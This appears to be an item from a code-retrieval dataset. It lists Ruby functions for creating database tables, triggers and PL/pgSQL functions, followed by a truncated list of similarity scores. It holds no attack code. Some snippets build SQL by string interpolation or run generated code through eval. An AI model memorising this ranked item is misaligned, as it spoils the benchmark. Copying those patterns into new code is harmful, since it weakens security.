"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def create_table(table_name, *args, **kwargs, &block)\n helper_context = self\n\n super do |t|\n t.define_singleton_method(:text) do |column_name, **kwargs|\n limit = kwargs.delete(:limit)\n\n super(column_name, **kwargs)\n\n if limit\n # rubocop:disable GitlabSecurity/PublicSend\n name = helper_context.send(:text_limit_name, table_name, column_name)\n # rubocop:enable GitlabSecurity/PublicSend\n\n column_name = helper_context.quote_column_name(column_name)\n definition = \"char_length(#{column_name}) <= #{limit}\"\n\n t.check_constraint(definition, name: name)\n end\n end\n\n t.instance_eval(&block) unless block.nil?\n end\n end",
"def triggers\n res = select_all <<-SQL\n SELECT n.nspname as schema,\n c.relname as table,\n t.tgname as trigger_name,\n t.tgenabled as enable_mode,\n t.tgdeferrable as is_deferrable,\n t.tginitdeferred as is_initially_deferrable,\n pg_catalog.pg_get_triggerdef(t.oid, true) as trigger_definition\n FROM pg_catalog.pg_trigger t\n INNER JOIN pg_catalog.pg_class c ON c.oid = t.tgrelid\n INNER JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v')\n AND NOT t.tgisinternal\n ORDER BY 1, 2, 3;\n SQL\n\n res.inject([]) do |buffer, row|\n schema = row['schema']\n table = row['table']\n trigger_name = row['trigger_name']\n is_deferrable = row['is_deferrable']\n is_initially_deferred = row['is_initially_deferred']\n\n trigger_definition = row['trigger_definition']\n\n is_constraint = is_constraint?(trigger_definition)\n proc_name = parse_proc_name(trigger_definition)\n event = parse_event(trigger_definition, trigger_name)\n condition = parse_condition(trigger_definition)\n\n for_every = !!(trigger_definition =~ /FOR[\\s]EACH[\\s]ROW/) ? :row : :statement\n\n if proc_name && event\n buffer << ::PgSaurus::ConnectionAdapters::TriggerDefinition.new(\n trigger_name,\n proc_name,\n is_constraint,\n event,\n for_every,\n is_deferrable,\n is_initially_deferred,\n condition,\n table,\n schema\n )\n end\n buffer\n end\n end",
"def TableCreateClicked\n unless getDBConn.conn\n msgbox(_(\"Warning\"), _(\"Currently there is no active database.\"), \"warning\")\n return null\n end\n\n tablename = knj_input(_(\"Name\"), _(\"Please enter the table name:\"))\n return null if tablename === false\n\n unless preg_match(\"/^[a-zA-Z][a-zA-Z0-9_]+/\", tablename, match)\n msgbox(_(\"Warning\"), _(\"The name you chooce is not a valid table-name.\"), \"warning\")\n return null\n end\n\n columns_count = knj_input(_(\"Columns\"), _(\"Please enter the number of columns you want:\"))\n return null if columns_count === false\n\n require_once(\"gui/win_table_create.php\")\n win_table_create = WinTableCreate.new(tablename, \"createtable\", columns_count)\n end",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n\n selector_column_definitions = column_definitions.select { |cd| selector_keys.include?(cd.name) }\n setter_column_definitions = column_definitions.select { |cd| setter_keys.include?(cd.name) }\n update_column_definitions = setter_column_definitions.select { |cd| cd.name !~ CREATED_COL_REGEX && !options[\"ignore_on_update\"].include?(cd.name) }\n\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def call(_obj, args, _ctx)\n create_table = Table.new(\n name: args[:name],\n quantity: args[:quantity],\n )\n return create_table if create_table.save\n GraphQL::ExecutionError.new(\"invalid data\")\n end",
"def trigger(*names, &block)\n if block.nil?\n names.each do |name|\n convert_method_to_trigger(name)\n end\n else\n name = names.first\n define_trigger_action(*names, &block)\n define_trigger(name)\n store_trigger(name)\n end\n end",
"def on_table(params = {})\n table = Yummi::Table::new params\n table.data = self\n return table\n end",
"def create_table_like(like_table, table, options = {}, &blk)\n options.symbolize_keys!\n code = table_schema_code(like_table)\n code.gsub!(/create_table\\s+\"#{like_table}\"/, \"create_table :#{table}\")\n if options[:replace_keys] or options[:remove_keys]\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"#add_index :#{table}\")\n else\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"add_index :#{table}\")\n end\n eval(code)\n change_table(table,&blk) if block_given?\n true\n end",
"def find_and_trigger_event(event_type, args = nil)\r\n \r\n case event_type\r\n when :before_change\r\n \r\n if respond_to?(:before_change)\r\n \r\n results = send(:before_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change\r\n \r\n if respond_to?(:after_change)\r\n \r\n results = send(:after_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_change_field\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:before_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:before_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change_field\r\n #looks in own class for :after_change_field for the field passed, requires the parameter of a Field object to be passed\r\n \r\n #SAPPHIRE UPDATE\r\n #SEARCH FOR ACTIVE MAP DEFINITION THAT INCLUDES THE CURRENT TABLE AND FIELD.\r\n #IF ANY ARE FOUND QUEUE THE PROCESS\r\n if args.table.field_order.include?(\"student_id\")\r\n \r\n if map_id = $tables.attach(\"SAPPHIRE_INTERFACE_MAP\").field_value(\r\n \"primary_id\",\r\n \"WHERE athena_table = '#{table_name }'\r\n AND athena_field = '#{args.field_name }'\r\n AND trigger_event = 'after_change_field'\"\r\n )\r\n \r\n sid = $tables.attach(args.table.table_name).field_value(\"student_id\", \"WHERE primary_id = '#{args.primary_id}'\")\r\n student = $students.get(sid)\r\n \r\n if student && student.active.is_true?\r\n \r\n queue_record = $tables.attach(\"SAPPHIRE_INTERFACE_QUEUE\").new_row\r\n queue_record.fields[\"map_id\" ].value = map_id\r\n queue_record.fields[\"athena_pid\" ].value = args.primary_id\r\n queue_record.save\r\n \r\n end\r\n \r\n end\r\n \r\n end\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:after_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:after_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_load #any table can have this event for self table\r\n \r\n continue_with_load = true\r\n \r\n this_trigger_event = \"before_load_#{table_name.downcase}\"\r\n \r\n tables_with_before_load_events = args ? args : event_array(this_trigger_event)\r\n \r\n tables_with_before_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n \r\n begin\r\n continue_with_load = this_table.send(this_trigger_event)\r\n \r\n rescue=> e\r\n #raise e #THIS SHOULD HAVE BEEN A SYSTEM NOTIFICATION - ADDING NOW BUT LEACING THIS NOTE HERE TO HELP IDENTIFY ANY ISSUES THAT MAY COME TO LIGHT WHICH WERE CONCEALED BY THIS BEFORE...\r\n $base.system_notification(\r\n subject = \"BEFORE LOAD FAILED - #{file}\",\r\n content = \"Don't just stand there and shout it; do something about it... 
Here's the error:\r\n #{e.message}\r\n <br>\r\n <br>\r\n #{e.backtrace}\"\r\n )\r\n \r\n end\r\n \r\n } if tables_with_before_load_events\r\n \r\n return continue_with_load\r\n \r\n when :after_load #any table can have this event for self table\r\n \r\n this_trigger_event = \"after_load_#{table_name.downcase}\"\r\n \r\n tables_with_after_load_events = args ? args.dup : event_array(this_trigger_event)\r\n \r\n db_config_record(\r\n field_name = \"phase_total\",\r\n new_value = tables_with_after_load_events.join(\",\")\r\n )\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = nil\r\n )\r\n \r\n if !args || args.include?(\"move_source_to_dest\")\r\n tables_with_after_load_events.delete(\"move_source_to_dest\")\r\n move_source_to_dest\r\n end\r\n \r\n tables_with_after_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Started #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n begin\r\n this_table.send(this_trigger_event)\r\n db_config_record = $tables.attach(\"Db_Config\").by_table_name(table_name)\r\n phase_completed = db_config_record.fields[\"phase_completed\"].value\r\n phase_completed = (phase_completed ? \"#{phase_completed},#{file}\" : file)\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = phase_completed\r\n )\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Completed #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n rescue=> e\r\n after_load_failed(message = \"#{file} - #{e.message} <br><br> #{e.backtrace}\", e)\r\n raise e\r\n end\r\n \r\n } if tables_with_after_load_events\r\n \r\n when :after_insert\r\n send(:after_insert, args) if respond_to?(:after_insert)\r\n \r\n when :after_save\r\n send(:after_save, args) if respond_to?(:after_save)\r\n \r\n when :before_insert\r\n #Looks in own class for before_insert event, requires the parameter of a Row object to be passed\r\n if respond_to?(:before_insert)\r\n send(:before_insert, args)\r\n else\r\n return true\r\n end\r\n \r\n end\r\n \r\n return true\r\n \r\n end",
"def create_event(db, name, type, date, happened)\n db.execute(\"INSERT INTO events (event_name, type_of_event, date_of_event, has_happened) VALUES (?, ?, ?, ?)\", [name, type, date, happened])\nend",
"def trigger(event_name, args, object, scope: nil)\n field = @schema.get_field(\"Subscription\", event_name)\n if !field\n raise \"No subscription matching trigger: #{event_name}\"\n end\n\n event = Subscriptions::Event.new(\n name: event_name,\n arguments: args,\n field: field,\n scope: scope,\n )\n execute_all(event, object)\n end",
"def trigger_by_scope!(event, *args, &block)\n trigger!(event, block, *args)\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def triggerType _args\n \"triggerType _args;\" \n end",
"def create(name, table)\n Utils.model(name).new(table.hashes.first).tap do |document|\n document.save\n end\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def trigger(*args)\n username, arguments = extract_username(args)\n trigger_id = get_id_from_arguments(arguments)\n\n get api_url(username, 'triggers', trigger_id)\n end",
"def add_trigger_action(opts)\n a = Action.new\n a.trigger_id = opts[:trigger_id]\n a.action_type = Action::Type.lookup(opts[:action_type])\n a.target_id = opts[:target_id].to_i\n a.args = opts[:args]\n\n a.save!\n a\n end",
"def trigger!\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg) + hstore_delete_handlers.map(&:to_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def initialize(table_name:, columns:, on_conflict:, into:)\n @columns = columns\n @into = into\n\n cols = []\n vals = []\n\n cols += columns\n vals += columns.each_with_index.map { |_, idx| \"$#{idx + 1}\" }\n\n timestamp_columns = SQL::Reflection.timestamp_columns(table_name) - columns.map(&:to_s)\n\n cols += timestamp_columns\n vals += timestamp_columns.map { \"now()\" }\n\n returning = into ? '*' : \"id\"\n\n @sql = \"INSERT INTO #{table_name} (#{cols.join(',')}) VALUES(#{vals.join(',')}) #{confict_handling(on_conflict)} RETURNING #{returning}\"\n end",
"def trigger(side, event, *args)\n self.class.hooks[:\"#{ side }_#{ event }\"].each do |method_name|\n if method(method_name).arity.zero?\n __send__(method_name)\n else\n __send__(method_name, *args)\n end\n end\n\n nil\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def notify_each opts={}\n _notification_builders[opts[:on] || :after_create] << Supports::Notifications::Builders::NotificationBuilder.new(opts)\n end",
"def where_table(*args, &b)\n set_parameters(args, true, &b)\n end",
"def CreateTrigger params = {}\n \n APICall(path: 'triggers.json',method: 'POST',payload: params.to_json)\n \n end",
"def create_table\n connection.create_table table_name do |t|\n t.string :record_class_name, :null => false\n t.integer :record_id, :null => false\n t.boolean :is_delete, :null => false, :default => false\n t.datetime :run_at, :null => false\n t.integer :priority, :null => false, :default => 0\n t.integer :lock, :null => true\n t.string :error, :null => true, :limit => 4000\n t.integer :attempts, :null => false, :default => 0\n end\n\n connection.add_index table_name, :record_id\n connection.add_index table_name, [:run_at, :record_class_name, :priority], :name => \"#{table_name}_run_at\"\n end",
"def create_or_update_functions(db: EventSourcery::Postgres.config.event_store_database,\n function_name: EventSourcery::Postgres.config.write_events_function_name,\n events_table_name: EventSourcery::Postgres.config.events_table_name,\n aggregates_table_name: EventSourcery::Postgres.config.aggregates_table_name)\n db.run <<-SQL\ncreate or replace function #{function_name}(_aggregateId uuid,\n _eventTypes varchar[],\n _expectedVersion int,\n _bodies json[],\n _createdAtTimes timestamp without time zone[],\n _eventUUIDs uuid[],\n _correlationIds uuid[],\n _causationIds uuid[],\n _lockTable boolean) returns void as $$\ndeclare\ncurrentVersion int;\nbody json;\neventVersion int;\neventId text;\nindex int;\nnewVersion int;\nnumEvents int;\ncreatedAt timestamp without time zone;\nbegin\nnumEvents := array_length(_bodies, 1);\nselect version into currentVersion from #{aggregates_table_name} where aggregate_id = _aggregateId;\nif not found then\n -- when we have no existing version for this aggregate\n if _expectedVersion = 0 or _expectedVersion is null then\n -- set the version to 1 if expected version is null or 0\n insert into #{aggregates_table_name}(aggregate_id, version) values(_aggregateId, numEvents);\n currentVersion := 0;\n else\n raise 'Concurrency conflict. Current version: 0, expected version: %', _expectedVersion;\n end if;\nelse\n if _expectedVersion is null then\n -- automatically increment the version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId returning version into newVersion;\n currentVersion := newVersion - numEvents;\n else\n -- increment the version if it's at our expected version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId and version = _expectedVersion;\n if not found then\n -- version was not at expected_version, raise an error.\n -- currentVersion may not equal what it did in the database when the\n -- above update statement is executed (it may have been incremented by another\n -- process)\n raise 'Concurrency conflict. Last known current version: %, expected version: %', currentVersion, _expectedVersion;\n end if;\n end if;\nend if;\nindex := 1;\neventVersion := currentVersion + 1;\nif _lockTable then\n -- Ensure this transaction is the only one writing events to guarantee\n -- linear growth of sequence IDs.\n -- Any value that won't conflict with other advisory locks will work.\n -- The Postgres tracker currently obtains an advisory lock using it's\n -- integer row ID, so values 1 to the number of ESP's in the system would\n -- be taken if the tracker is running in the same database as your\n -- projections.\n perform pg_advisory_xact_lock(-1);\nend if;\nforeach body IN ARRAY(_bodies)\nloop\n if _createdAtTimes[index] is not null then\n createdAt := _createdAtTimes[index];\n else\n createdAt := now() at time zone 'utc';\n end if;\n\n insert into #{events_table_name}\n (uuid, aggregate_id, type, body, version, correlation_id, causation_id, created_at)\n values\n (\n _eventUUIDs[index],\n _aggregateId,\n _eventTypes[index],\n body,\n eventVersion,\n _correlationIds[index],\n _causationIds[index],\n createdAt\n )\n returning id into eventId;\n\n eventVersion := eventVersion + 1;\n index := index + 1;\nend loop;\nperform pg_notify('new_event', eventId);\nend;\n$$ language plpgsql;\nSQL\n end",
"def trigger(event, opts = {})\n trigger!(event, opts)\n rescue Socky::Client::Error => e\n Socky::Client.logger.error(\"#{e.message} (#{e.class})\")\n Socky::Client.logger.debug(e.backtrace.join(\"\\n\"))\n false\n end",
"def enable_event_trigger(name, options = {})\n if options[:always] && options[:replica]\n raise ArgumentError.new(\"Cannot use :replica and :always together when enabling an event trigger.\")\n end\n\n sql = \"ALTER EVENT TRIGGER #{quote_generic(name)} ENABLE\"\n\n if options[:always]\n sql << ' ALWAYS'\n elsif options[:replica]\n sql << ' REPLICA'\n end\n\n execute \"#{sql};\"\n end",
"def create_table_actions atable, todo, data, categ\n #@new_act = Action.new(\"New Row\", \"mnemonic\"=>\"N\") { \n @new_act = Action.new(\"&New Row\") { \n cc = atable.get_table_column_model.column_count\n if atable.row_count < 1\n categ = nil\n frow = 0\n else\n frow = atable.focussed_row\n categ = atable.get_value_at(frow,1)\n frow += 1\n end\n tmp = [nil, categ, \"\", 5, \"\", \"TODO\", Time.now]\n tm = atable.table_model\n tm.insert frow, tmp\n atable.set_focus_on frow\n @status_row.text = \"Added a row. Please press Save before changing Category.\"\n alert(\"Added a row below current one. Use C-k to clear task.\")\n }\n @new_act.accelerator \"Alt-N\"\n @save_cmd = lambda {\n todo.set_tasks_for_category categ, data\n todo.dump\n alert(\"Rewritten yaml file\")\n }\n @del_cmd = lambda { \n row = atable.focussed_row\n if confirm(\"Do your really want to delete row #{row+1}?\")== :YES\n tm = atable.table_model\n tm.delete_at row\n else\n @status_row.text = \"Delete cancelled\"\n end\n }\n\n end",
"def create_event_store(db: EventSourcery::Postgres.config.event_store_database,\n events_table_name: EventSourcery::Postgres.config.events_table_name,\n aggregates_table_name: EventSourcery::Postgres.config.aggregates_table_name,\n write_events_function_name: EventSourcery::Postgres.config.write_events_function_name)\n create_events(db: db, table_name: events_table_name)\n create_aggregates(db: db, table_name: aggregates_table_name)\n create_or_update_functions(db: db, events_table_name: events_table_name, function_name: write_events_function_name, aggregates_table_name: aggregates_table_name)\n end",
"def create(table_name, attributes)\n\n # Perform the creation and returns the id\n Operations::Create.new(@rforce_binding, table_name, attributes).run()\n\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def initialize( table, columns, opts = {} )\n @table = table\n @columns = [ *columns ]\n @opts = opts\n end",
"def create(tablename)\n #allow us to pass either a single symbol or an array of symbols.\n if Symbol === tablename\n tablename = [tablename]\n end\n\n tablename.each do |table|\n #standard creation protocol.\n $BS.create table\n\n #here is the reflective magic. Defined below in this list is this thingy.\n $BS.connect {|db| eval \"data_#{table} db\"}\n end\n\n $BS\nend",
"def make_table(table, *args, others)\n unless others.is_a? Hash\n args << others\n others = {}\n end\n table = table.to_s # probably already was\n table_sym = table.to_sym\n @fields[table_sym] = args + others.keys\n @xform[table_sym] = {:inspect => [], :yaml => []}\n xform, fields = @xform, @fields # because of change in 'self'\n @db.create_table table_sym do\n primary_key table+\"_id\"\n args.each do |field| \n if field.to_s =~ /_id$/\n Integer field \n else\n String field\n end\n end\n others.each_pair do |field, klass|\n case klass.to_s.to_sym\n when :Integer; Integer field\n when :String; String field\n when :Float; Float field\n when :DateTime; DateTime field\n when :Array, :Hash, :Symbol\n String field\n xform[table_sym][:inspect] << field\n when :Yaml\n String field\n xform[table_sym][:yaml] << field\n end\n end\n end\n # Now save metadata...\n args_hash = {}\n args.each {|arg| args_hash.update(arg => :String) }\n args_hash.update(others)\n args_hash.each_pair {|k, v| args_hash[k] = v.to_s.to_sym }\n @db[:metadata].insert(:table => table, :transform => xform[table_sym].to_yaml, \n :fields => fields[table_sym].to_yaml)\n end",
"def triggers\n\n end",
"def create_patient_table(options_table)\n options_table.raw.each do |row|\n case row[0].downcase\n when 'first name'\n first_name.set row[1]\n when 'last name'\n last_name.set row[1]\n when 'email'\n sleep 1\n email.set row[1]\n when 'date of birth'\n sleep 3\n dob.click\n dob.set row[1]\n sleep 1\n when 'ref physician'\n ref_physician.set row[1]\n when 'gender'\n gender_dropdown.click\n sleep 2\n gender_select.each do |gen|\n gen.click if gen.text == row[1]\n end\n when 'physician'\n physician_dropdown.click\n physician_select.each do |phy|\n phy.click if phy.text == row[1]\n end\n when 'office location'\n office_location_dropdown.click\n office_select.each do |ol|\n ol.click if ol.text == row[1]\n end\n when 'clinic_mode_email'\n clinic_mode_email.set row[1]\n when 'clinic_mode_physician'\n clinic_mode_physician_dropdown.click\n physician_select.each do |phy|\n phy.click if phy.text == row[1]\n end\n\n else\n raise \"Option #{row[0]} is not a valid argument\"\n end\n end\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def insert_table_definition(args)\r\n\r\n submission_database_id = nil\r\n submission = args[:submission]\r\n form_definition = args[:form_definition]\r\n form_table_name = args[:form_table_name]\r\n kapp_slug = args[:kapp_slug]\r\n form_slug = args[:form_slug]\r\n\r\n table_def_name = \"table_definitions\"\r\n\r\n #Table definition generation.\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n\r\n # Once the table has been created/modified/verified, insert the submission into the table\r\n db_submission = {\r\n :tableName => form_table_name,\r\n :kappSlug => kapp_slug,\r\n :formSlug => form_slug,\r\n :formName => form_definition['name']\r\n }\r\n\r\n puts \"Upserting the table definition for the table '#{form_table_name}' into '#{table_def_name}'\" if @enable_debug_logging\r\n db_submissions = @db[table_def_name.to_sym]\r\n if db_submissions.select(:tableName).where(:tableName => form_table_name).count == 0 then\r\n submission_database_id = db_submissions.insert(db_submission)\r\n else\r\n submission_database_id = db_submissions.where(:tableName => form_table_name).update(db_submission) unless @info_values['ignore_updates']\r\n end\r\n end\r\n\r\n submission_database_id\r\n\r\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def _save(opts)\n pk = nil\n called_save = false\n called_cu = false\n around_save do\n called_save = true\n before_save\n\n if new?\n around_create do\n called_cu = true\n before_create\n pk = _insert\n @this = nil\n @new = false\n @modified = false\n pk ? _save_refresh : changed_columns.clear\n after_create\n true\n end\n raise_hook_failure(:around_create) unless called_cu\n else\n around_update do\n called_cu = true\n before_update\n columns = opts[:columns]\n if columns.nil?\n columns_updated = if opts[:changed]\n @values.reject{|k,v| !changed_columns.include?(k)}\n else\n _save_update_all_columns_hash\n end\n changed_columns.clear\n else # update only the specified columns\n columns = Array(columns)\n columns_updated = @values.reject{|k, v| !columns.include?(k)}\n changed_columns.reject!{|c| columns.include?(c)}\n end\n _update_columns(columns_updated)\n @this = nil\n @modified = false\n after_update\n true\n end\n raise_hook_failure(:around_update) unless called_cu\n end\n after_save\n true\n end\n raise_hook_failure(:around_save) unless called_save\n self\n end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def initialize(table, columns, values, opts = {})\n @table = table.to_sym\n @opts = opts\n @sql_insert = ::MultiInsert::QueryBuilder.insert(table, columns, values, opts)\n end",
"def alter_table(name, &block)\n g = Schema::AlterTableGenerator.new(self, &block)\n alter_table_sql_list(name, g.operations).each {|sql| execute(sql)}\n end",
"def crud_table(*attrs, &block)\n if block_given?\n list_table(*attrs, &block)\n else\n attrs = attrs_or_default(attrs) { default_attrs }\n list_table(*attrs) do |t|\n add_table_actions(t)\n end\n end\n end",
"def method_missing(name, *args)\n if args.empty?\n super\n else\n @table[\"_function_\"] = _klass_new(name, *args)\n end\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def table(table)\n @table = table\n\n @aliased_table = @table.new(@table.table_name)\n end",
"def show_create_table(db, table)\n end",
"def after_create(record)\n contents = to_sql_insert(record)\n to_logfile(contents)\n # Send a notification to the admin, if requested:\n if @email_on_create\n AgexMailer.action_notify_mail(\n record.respond_to?(:user) ? record.user : nil,\n \"#{@table_name} row CREATED\",\n contents\n ).deliver\n end\n end"
] |
[
"0.75036204",
"0.71252567",
"0.71252567",
"0.6725345",
"0.63516825",
"0.6272723",
"0.59450215",
"0.5315169",
"0.51494783",
"0.5082",
"0.506205",
"0.5035983",
"0.50323826",
"0.49635643",
"0.49058893",
"0.48846143",
"0.4867852",
"0.48573887",
"0.48499548",
"0.4799055",
"0.47917128",
"0.4787895",
"0.47744462",
"0.47735012",
"0.47432178",
"0.47263667",
"0.47195897",
"0.47111592",
"0.47080654",
"0.46784398",
"0.4677261",
"0.46649727",
"0.46496737",
"0.4644022",
"0.45878473",
"0.45709145",
"0.45708746",
"0.45667443",
"0.45645747",
"0.45630127",
"0.45556417",
"0.45480636",
"0.45472473",
"0.4542391",
"0.4520883",
"0.44978598",
"0.44920057",
"0.4440992",
"0.44205973",
"0.43964526",
"0.43925396",
"0.43875486",
"0.4346404",
"0.43249118",
"0.43176493",
"0.43161243",
"0.43123215",
"0.43078655",
"0.4300772",
"0.42933765",
"0.4275939",
"0.42754638",
"0.42551497",
"0.42549935",
"0.42468065",
"0.42398638",
"0.42257556",
"0.4217697",
"0.42112157",
"0.4200109",
